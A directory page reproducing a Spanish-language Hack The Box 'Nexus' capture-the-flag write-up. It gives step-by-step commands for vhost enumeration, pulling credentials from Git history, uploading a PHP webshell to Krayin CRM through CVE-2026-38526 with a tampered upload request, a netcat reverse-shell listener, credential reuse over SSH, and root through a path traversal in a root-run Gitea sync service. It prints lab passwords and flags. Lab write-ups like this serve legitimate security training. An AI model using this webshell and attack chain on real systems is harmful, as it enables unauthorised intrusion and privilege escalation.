Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
htb-labs-nexus — Hack The Box Nexus machine write-up covering reconnaissance, Gitea credential discovery, Krayin CRM exploitation via CVE-2026-38526, initial access, and privilege escalation through a vulnerable Gitea template synchronization service. | Kitploit
Herramientas/GitHubGitHub/diegorivas1/htb-labs-nexus
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityCTFPenetration TestingLearning & Education

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Labs & Practice
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

Hack The Box Nexus machine write-up covering reconnaissance, Gitea credential discovery, Krayin CRM exploitation via CVE-2026-38526, initial access, and privilege escalation through a vulnerable Gitea template synchronization service.

Ver Repositorio
hace 8h 2mAún no revisado

🏴‍☠️ HTB Labs - Nexus

English 🇺🇸 | Español 🇪🇸

English | Español

HTB Difficulty OS Platform

📋 Resumen

Nexus es una máquina Linux de dificultad fácil de Hack The Box que presenta una cadena de ataque basada en enumeración de hosts virtuales, descubrimiento de credenciales expuestas, explotación de una aplicación web vulnerable, ejecución remota de comandos y escalada de privilegios mediante un servicio ejecutado como root.

Cadena de Ataque

root@kitploit:~
Reconocimiento
      │
      ▼
Enumeración de Virtual Hosts
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      Historial de Gitea
              │
              ▼
    Credenciales expuestas
              │
              ▼
       Login en Krayin
              │
              ▼
      CVE-2026-38526
              │
              ▼
         Webshell PHP
              │
              ▼
       Reverse Shell
        (www-data)
              │
              ▼
          .env
              │
              ▼
        SSH como jones
              │
              ▼
   gitea-template-sync
              │
              ▼
       Path Traversal
              │
              ▼
   Repositorio Git malicioso
              │
              ▼
         SSH como root

Técnicas principales

  • 🔍 Enumeración de subdominios
  • 🔑 Obtención de credenciales desde commits de Git
  • 💻 Explotación de Krayin CRM
  • 🐚 Webshell y reverse shell
  • 🔐 Reutilización de credenciales
  • 🔬 Enumeración de servicios Linux
  • 📂 Path Traversal
  • 🌳 Creación de repositorio Git malicioso
  • 👑 Escalada de privilegios a root

IP objetivo: 10.129.82.92


🔍 Fase 1 Reconocimiento

Escaneo de puertos

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

Resultado:

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

Enumeración de Virtual Hosts

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

Hosts encontrados:

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

Agregar los hosts:

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 Fase 2 Obtención de Credenciales

Acceder a:

root@kitploit:~
http://git.nexus.htb

El repositorio:

root@kitploit:~
admin/krayin-docker-setup

contiene información interesante en el historial de commits.

Al revisar versiones anteriores del archivo .env se encuentran credenciales.

ServicioUsuarioContraseña
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

El correo [email protected] también fue identificado en la sección de empleos de la página principal.


💻 Fase 3 Explotación de CVE-2026-38526

Acceder al panel:

root@kitploit:~
http://billing.nexus.htb/admin/login

Credenciales:

root@kitploit:~
Email: [email protected]
Password: N27xh!!2ucY04

Navegar a:

root@kitploit:~
/admin/mail/sent

Crear un nuevo correo y adjuntar el payload PHP.

El archivo se encuentra en:

root@kitploit:~
exploits/CVE-2026-38526/shell.php

Payload:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

Interceptar la petición mediante Burp Suite y modificar:

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

Después de la subida, acceder al webshell:

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

Resultado:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 Fase 4 Reverse Shell

En Kali:

root@kitploit:~
nc -lvnp 4444

Ejecutar el payload de reverse shell mediante el webshell.

El script correspondiente se encuentra en:

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

La sesión obtenida corresponde al usuario:

root@kitploit:~
www-data

🐚 Fase 5 Acceso como jones

Leer la configuración de Krayin:

root@kitploit:~
cat /var/www/krayin/.env

Se encuentran:

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

Enumerar usuarios:

root@kitploit:~
cat /etc/passwd | grep sh$

Se identifica:

root@kitploit:~
jones

Con las credenciales obtenidas:

root@kitploit:~
ssh [email protected]

Password:

root@kitploit:~
y27xb3ha!!74GbR

Flag de usuario

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 Fase 6 Escalada de Privilegios

Enumerar los servicios relacionados con Gitea:

root@kitploit:~
systemctl list-units | grep -i gitea

Se encuentran:

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

El servicio se ejecuta con privilegios elevados y utiliza:

root@kitploit:~
/etc/gitea/template-sync.py

El script presenta una condición de Path Traversal en la construcción de rutas.


🎯 Fase 7 Repositorio Git Malicioso

Generar la clave SSH:

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

El exploit se encuentra en:

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

Crear el repositorio:

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

La rama utilizada debe ser:

root@kitploit:~
main

Generar un token desde:

root@kitploit:~
http://git.nexus.htb

En:

root@kitploit:~
Settings → Applications

Configurar el remote:

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

Subir el repositorio:

root@kitploit:~
git push -f origin main

⏰ Fase 8 Sincronización

Monitorizar:

root@kitploit:~
tail -f /var/log/template-sync.log

Una sincronización exitosa muestra que el servicio procesó la ruta controlada mediante el repositorio malicioso.


👑 Fase 9 Root

Una vez escrita la clave pública:

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

Comprobar:

root@kitploit:~
whoami

Resultado:

root@kitploit:~
root

Obtener la flag:

root@kitploit:~
cat /root/root.txt

Root Flag

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 Flags

FlagValor
Userf20cbf9aeb6bb228d356a42ff49c1933
Root85be1d2a3084e387da0e7dd118908c63

🛠️ Herramientas Utilizadas


📂 Estructura del Repositorio

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

⚠️ Disclaimer

Este repositorio tiene fines educativos y de práctica en entornos autorizados.

Las técnicas, credenciales, exploits y comandos documentados no deben utilizarse contra sistemas sin autorización explícita.


🎯 Lecciones Principales

  1. 🔍 Enumerar Virtual Hosts: los servicios importantes pueden estar ocultos detrás de subdominios.
  2. 🔑 Revisar el historial de Git: eliminar un secreto de un archivo no significa que haya desaparecido del historial.
  3. 💻 Analizar las subidas de archivos: las validaciones de extensión y MIME pueden ser críticas.
  4. 🐚 Enumerar después de obtener una shell: los archivos de configuración pueden proporcionar credenciales reutilizables.
  5. 🔬 Revisar servicios privilegiados: un servicio ejecutado como root puede convertirse en un vector de escalada.
  6. 📂 Validar correctamente las rutas: el uso inseguro de rutas controladas por el usuario puede introducir Path Traversal.
  7. 🌳 Git puede convertirse en un vector de ataque: los objetos y árboles Git pueden manipularse cuando una aplicación confía incorrectamente en su estructura.

🙏 Credits

  • Hack The Box : Machine and laboratory platform
  • P3lured : Original write-up
  • Tran Manh Tan : Complementary guide

⭐ Si este write-up te resultó útil, considera darle una estrella al repositorio.

Descargar herramienta
HerramientaUso
NmapEnumeración de puertos y servicios
GobusterEnumeración de Virtual Hosts
Burp SuiteInterceptación y modificación de peticiones
GitAnálisis y creación de repositorios
Python 3Scripts de explotación
NetcatReverse shell
LinEnumEnumeración Linux
LinPEASEnumeración para privilege escalation
SSHAcceso remoto